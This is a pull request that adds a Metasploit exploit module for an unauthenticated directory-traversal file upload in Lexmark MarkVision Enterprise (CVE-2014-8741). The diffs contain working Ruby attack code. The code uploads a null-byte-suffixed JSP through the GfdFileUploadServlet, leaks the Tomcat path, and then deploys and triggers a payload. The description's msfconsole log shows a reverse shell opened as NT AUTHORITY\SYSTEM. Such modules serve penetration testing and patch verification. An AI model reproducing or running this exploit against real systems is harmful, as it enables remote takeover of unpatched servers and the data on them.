### PR TITLE
Add module for ZDI-14-410 Lexmark Markvision Enterprise RCE

### DIFF
--- a/modules/exploits/windows/http/lexmark_markvision_gfd_upload.rb
+++ b/modules/exploits/windows/http/lexmark_markvision_gfd_upload.rb
@@ -1,0 +1,112 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'          => 'Lexmark MarkVision Enterprise Arbitrary File Upload',
+      'Description'   => %q{
+        This module exploits a code execution flaw in Lexmark MarkVision Enterprise before 2.1. A
+        directory traversal in the GfdFileUploadServlet servlet allows an unauthenticated attacker
+        to upload arbitrary files. Since the embedded tomcat application server enables auto deploy
+        it's possible to upload a WAR file to achieve remote code execution. This module has been
+        tested successfully on Lexmark MarkVision Enterprise 2.0 with Windows 2003 SP2.
+      },
+      'Author'        =>
+        [
+          'Andrea Micalizzi', # Vulnerability Discovery
+          'juan vazquez' # Metasploit module
+        ],
+      'License'       => MSF_LICENSE,
+      'References'    =>
+        [
+          ['CVE', '2014-8741'],
+          ['ZDI', '14-410']
+        ],
+      'Privileged'    => true,
+      'Platform'      => 'win',
+      'Arch'          => ARCH_JAVA,
+      'Targets'       =>
+        [
+          [ 'Lexmark Markvision Enterprise 2.0', { } ]
+        ],
+      'DefaultTarget'  => 0,
+      'DisclosureDate' => 'Jan 17 2012'))
+
+    register_options(
+      [
+        Opt::RPORT(9788),
+        OptString.new('TARGETURI', [true, 'Path to SonicWall GMS', '/'])
+      ], self.class)
+  end
+
+  def check
+    res = send_request_cgi({
+      'uri' => normalize_uri(target_uri.path.to_s, 'mve', 'help', 'en', 'inventory', 'am_about.html')
+    })
+
+    version = nil
+    if res && res.code == 200 && res.body && res.body.to_s =~ /MarkVision Enterprise ([\d\.]+)/
+      version = $1
+    else
+      return Exploit::CheckCode::Unknown
+    end
+
+    if Gem::Version.new(version) <= Gem::Version.new('2.0.0')
+      return Exploit::CheckCode::Appears
+    end
+
+    Exploit::CheckCode::Safe
+  end
+
+  def exploit
+    jsp_name = "#{rand_text_alphanumeric(4+rand(32-4))}.jsp"
+    jsp = payload.encoded
+    # By default files uploaded to C:\Program Files\Lexmark\Markvision Enterprise\apps\library\gfd-scheduled
+    # Default app folder on C:\Program Files\Lexmark\Markvision Enterprise\tomcat\webappps\ROOT
+    traversal_attack = "/..\\..\\..\\tomcat\\webapps\\ROOT\\#{jsp_name}\x00.pdf"
+
+    print_status("#{peer} - Uploading JSP payload...")
+    if upload_file(traversal_attack, jsp)
+      print_good("#{peer} - JSP successfully updated")
+    else
+      fail_with(Failure::Unknown, "#{peer} - JSP update failed")
+    end
+
+    print_status("#{peer} - Executing payload...")
+    send_request_cgi({'uri' => normalize_uri(target_uri.path.to_s, jsp_name)}, 3)
+  end
+
+  def upload_file(filename, contents)
+    good_signature = rand_text_alpha(4 + rand(4))
+    bad_signature = rand_text_alpha(4 + rand(4))
+
+    post_data = Rex::MIME::Message.new
+    post_data.add_part(good_signature, nil, nil, "form-data; name=\"success\"")
+    post_data.add_part(bad_signature, nil, nil, "form-data; name=\"failure\"")
+    post_data.add_part(contents, "application/octet-stream", nil, "form-data; name=\"datafile\"; filename=\"#{filename}\"")
+
+    res = send_request_cgi(
+      {
+        'uri'    => normalize_uri(target_uri.path, 'mve', 'upload', 'gfd'),
+        'method' => 'POST',
+        'data'   => post_data.to_s,
+        'ctype'  => "multipart/form-data; boundary=#{post_data.bound}"
+      })
+
+    if res && res.code == 200 && res.body && res.body.to_s.include?(good_signature)
+      return true
+    else
+      return false
+    end
+  end
+
+end

--- a/modules/exploits/windows/http/lexmark_markvision_gfd_upload.rb
+++ b/modules/exploits/windows/http/lexmark_markvision_gfd_upload.rb
@@ -8,6 +8,7 @@ require 'msf/core'
 class Metasploit3 < Msf::Exploit::Remote
   Rank = ExcellentRanking
 
+  include Msf::Exploit::FileDropper
   include Msf::Exploit::Remote::HttpClient
 
   def initialize(info = {})
@@ -44,7 +45,7 @@ class Metasploit3 < Msf::Exploit::Remote
     register_options(
       [
         Opt::RPORT(9788),
-        OptString.new('TARGETURI', [true, 'Path to SonicWall GMS', '/'])
+        OptString.new('TARGETURI', [true, 'ROOT path', '/'])
       ], self.class)
   end
 
@@ -68,21 +69,43 @@ class Metasploit3 < Msf::Exploit::Remote
   end
 
   def exploit
-    jsp_name = "#{rand_text_alphanumeric(4+rand(32-4))}.jsp"
-    jsp = payload.encoded
+    jsp_leak = jsp_path
+    jsp_name_leak = "#{rand_text_alphanumeric(4+rand(32-4))}.jsp"
     # By default files uploaded to C:\Program Files\Lexmark\Markvision Enterprise\apps\library\gfd-scheduled
     # Default app folder on C:\Program Files\Lexmark\Markvision Enterprise\tomcat\webappps\ROOT
-    traversal_attack = "/..\\..\\..\\tomcat\\webapps\\ROOT\\#{jsp_name}\x00.pdf"
+    traversal_leak = "/..\\..\\..\\tomcat\\webapps\\ROOT\\#{jsp_name_leak}\x00.pdf"
 
-    print_status("#{peer} - Uploading JSP payload...")
-    if upload_file(traversal_attack, jsp)
+    print_status("#{peer} - Uploading info leak JSP #{jsp_name_leak}...")
+    if upload_file(traversal_leak, jsp_leak)
       print_good("#{peer} - JSP successfully updated")
     else
       fail_with(Failure::Unknown, "#{peer} - JSP update failed")
     end
 
+    res = execute(jsp_name_leak)
+
+    if res && res.code == 200 && res.body.to_s !~ /null/ && res.body.to_s =~ /Path:(.*)/
+      upload_path = $1
+      print_good("#{peer} - Working directory found in #{upload_path}")
+      register_file_for_cleanup(::File.join(upload_path, 'webapps', 'ROOT', jsp_name_leak))
+    else
+      print_error("#{peer} - Couldn't retrieve the upload directory, manual cleanup will be required")
+    end
+
+    jsp_payload_name = "#{rand_text_alphanumeric(4+rand(32-4))}.jsp"
+    jsp_payload = payload.encoded
+    traversal_payload = "/..\\..\\..\\tomcat\\webapps\\ROOT\\#{jsp_payload_name}\x00.pdf"
+
+    print_status("#{peer} - Uploading JSP payload...")
+    if upload_file(traversal_payload, jsp_payload)
+      print_good("#{peer} - JSP successfully updated")
+      register_file_for_cleanup(::File.join(upload_path, 'webapps', 'ROOT', jsp_payload_name))
+    else
+      fail_with(Failure::Unknown, "#{peer} - JSP update failed")
+    end
+
     print_status("#{peer} - Executing payload...")
-    send_request_cgi({'uri' => normalize_uri(target_uri.path.to_s, jsp_name)}, 3)
+    execute(jsp_payload_name, 3)
   end
 
   def upload_file(filename, contents)
@@ -107,6 +130,26 @@ class Metasploit3 < Msf::Exploit::Remote
     else
       return false
     end
+  end
+
+  def execute(jsp_name, time_out = 20)
+    res = send_request_cgi({
+      'uri'    => normalize_uri(target_uri.path.to_s, jsp_name),
+      'method' => 'GET'
+    }, time_out)
+
+    res
+  end
+
+  def jsp_path
+    jsp =<<-EOS
+<%@ page language="Java" import="java.util.*"%>
+<%
+out.println("Path:" + System.getProperty("catalina.home"));
+%>
+    EOS
+
+    jsp
   end
 
 end

--- a/modules/exploits/windows/http/lexmark_markvision_gfd_upload.rb
+++ b/modules/exploits/windows/http/lexmark_markvision_gfd_upload.rb
@@ -15,10 +15,9 @@ class Metasploit3 < Msf::Exploit::Remote
     super(update_info(info,
       'Name'          => 'Lexmark MarkVision Enterprise Arbitrary File Upload',
       'Description'   => %q{
-        This module exploits a code execution flaw in Lexmark MarkVision Enterprise before 2.1. A
-        directory traversal in the GfdFileUploadServlet servlet allows an unauthenticated attacker
-        to upload arbitrary files. Since the embedded tomcat application server enables auto deploy
-        it's possible to upload a WAR file to achieve remote code execution. This module has been
+        This module exploits a code execution flaw in Lexmark MarkVision Enterprise before 2.1.
+        A directory traversal in the GfdFileUploadServlet servlet allows an unauthenticated
+        attacker to upload arbitrary files, including arbitrary JSP code. This module has been
         tested successfully on Lexmark MarkVision Enterprise 2.0 with Windows 2003 SP2.
       },
       'Author'        =>
@@ -30,7 +29,8 @@ class Metasploit3 < Msf::Exploit::Remote
       'References'    =>
         [
           ['CVE', '2014-8741'],
-          ['ZDI', '14-410']
+          ['ZDI', '14-410'],
+          ['URL', 'http://support.lexmark.com/index?page=content&id=TE666&locale=EN&userlocale=EN_US']
         ],
       'Privileged'    => true,
       'Platform'      => 'win',
@@ -40,7 +40,7 @@ class Metasploit3 < Msf::Exploit::Remote
           [ 'Lexmark Markvision Enterprise 2.0', { } ]
         ],
       'DefaultTarget'  => 0,
-      'DisclosureDate' => 'Jan 17 2012'))
+      'DisclosureDate' => 'Dec 09 2014'))
 
     register_options(
       [
@@ -70,16 +70,16 @@ class Metasploit3 < Msf::Exploit::Remote
 
   def exploit
     jsp_leak = jsp_path
-    jsp_name_leak = "#{rand_text_alphanumeric(4+rand(32-4))}.jsp"
+    jsp_name_leak = "#{rand_text_alphanumeric(4 + rand(32 - 4))}.jsp"
     # By default files uploaded to C:\Program Files\Lexmark\Markvision Enterprise\apps\library\gfd-scheduled
     # Default app folder on C:\Program Files\Lexmark\Markvision Enterprise\tomcat\webappps\ROOT
     traversal_leak = "/..\\..\\..\\tomcat\\webapps\\ROOT\\#{jsp_name_leak}\x00.pdf"
 
     print_status("#{peer} - Uploading info leak JSP #{jsp_name_leak}...")
     if upload_file(traversal_leak, jsp_leak)
-      print_good("#{peer} - JSP successfully updated")
+      print_good("#{peer} - JSP successfully uploaded")
     else
-      fail_with(Failure::Unknown, "#{peer} - JSP update failed")
+      fail_with(Failure::Unknown, "#{peer} - JSP upload failed")
     end
 
     res = execute(jsp_name_leak)
@@ -96,12 +96,12 @@ class Metasploit3 < Msf::Exploit::Remote
     jsp_payload = payload.encoded
     traversal_payload = "/..\\..\\..\\tomcat\\webapps\\ROOT\\#{jsp_payload_name}\x00.pdf"
 
-    print_status("#{peer} - Uploading JSP payload...")
+    print_status("#{peer} - Uploading JSP payload #{jsp_payload_name}...")
     if upload_file(traversal_payload, jsp_payload)
-      print_good("#{peer} - JSP successfully updated")
-      register_file_for_cleanup(::File.join(upload_path, 'webapps', 'ROOT', jsp_payload_name))
+      print_good("#{peer} - JSP successfully uploaded")
+      register_file_for_cleanup(::File.join(upload_path, 'webapps', 'ROOT', jsp_payload_name)) if upload_path
     else
-      fail_with(Failure::Unknown, "#{peer} - JSP update failed")
+      fail_with(Failure::Unknown, "#{peer} - JSP upload failed")
     end
 
     print_status("#{peer} - Executing payload...")
@@ -113,9 +113,9 @@ class Metasploit3 < Msf::Exploit::Remote
     bad_signature = rand_text_alpha(4 + rand(4))
 
     post_data = Rex::MIME::Message.new
-    post_data.add_part(good_signature, nil, nil, "form-data; name=\"success\"")
-    post_data.add_part(bad_signature, nil, nil, "form-data; name=\"failure\"")
-    post_data.add_part(contents, "application/octet-stream", nil, "form-data; name=\"datafile\"; filename=\"#{filename}\"")
+    post_data.add_part(good_signature, nil, nil, 'form-data; name="success"')
+    post_data.add_part(bad_signature, nil, nil, 'form-data; name="failure"')
+    post_data.add_part(contents, 'application/octet-stream', nil, "form-data; name=\"datafile\"; filename=\"#{filename}\"")
 
     res = send_request_cgi(
       {


### PR DESCRIPTION
## Verification
- [x] Install Windows 2003 SP2
- [x] Install Lexmark markvision enterprise 2.0.0. It can be downloaded from: http://media.lexmark.com/www/package/markvision/MVE-2.0.0/MVE-2.0.0.exe
- [x] Verify which the webapp runs correctly on the port 9788/TCP
- [x] Run msfconsole
- [x] Use the module: `use exploit/windows/http/lexmark_markvision_gfd_upload`
- [x] set RHOST
- [x] run check, verify the target appears as vulnerable.

```
msf > use exploit/windows/http/lexmark_markvision_gfd_upload
msf exploit(lexmark_markvision_gfd_upload) > set rhost 172.16.158.133
rhost => 172.16.158.133
msf exploit(lexmark_markvision_gfd_upload) > check
[*] 172.16.158.133:9788 - The target appears to be vulnerable.
```
- [x] run exploit, verify you get a SYSTEM session back

```
msf exploit(lexmark_markvision_gfd_upload) > exploit

[*] Started reverse handler on 172.16.158.1:4444
[*] 172.16.158.133:9788 - Uploading info leak JSP 0YMi.jsp...
[+] 172.16.158.133:9788 - JSP successfully uploaded
[+] 172.16.158.133:9788 - Working directory found in C:\Program Files\Lexmark\Markvision Enterprise\tomcat
[*] 172.16.158.133:9788 - Uploading JSP payload Vs0EjhB.jsp...
[+] 172.16.158.133:9788 - JSP successfully uploaded
[*] 172.16.158.133:9788 - Executing payload...
[*] Command shell session 2 opened (172.16.158.1:4444 -> 172.16.158.133:1416) at 2014-12-29 10:39:20 -0600
/webapps/ROOT/0YMi.jsp Files\Lexmark\Markvision Enterprise\tomcat
/webapps/ROOT/Vs0EjhB.jsples\Lexmark\Markvision Enterprise\tomcat

Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.

C:\WINDOWS\system32>echo 2591175977;echo czOhXOibvlvtseuiicWFVxoUIZMxyKfe
2591175977;echo czOhXOibvlvtseuiicWFVxoUIZMxyKfe

\webapps\ROOT\0YMi.jsp" & echo " ' >/dev/null;echo JnJfKaLXyYQfxXIoetfwrFGGJsFLyfDFrise\tomcaton Enterprise\tomcat
" ' >/dev/null;echo JnJfKaLXyYQfxXIoetfwrFGGJsFLyfDF

C:\WINDOWS\system32>
\webapps\ROOT\Vs0EjhB.jsp" & echo " ' >/dev/null;echo PkPxLUOwwZglussibtPGxrkXTdFyILterise\tomcaton Enterprise\tomcat
" ' >/dev/null;echo PkPxLUOwwZglussibtPGxrkXTdFyILte

C:\WINDOWS\system32>
C:\WINDOWS\system32>whoami
whoami
nt authority\system

```
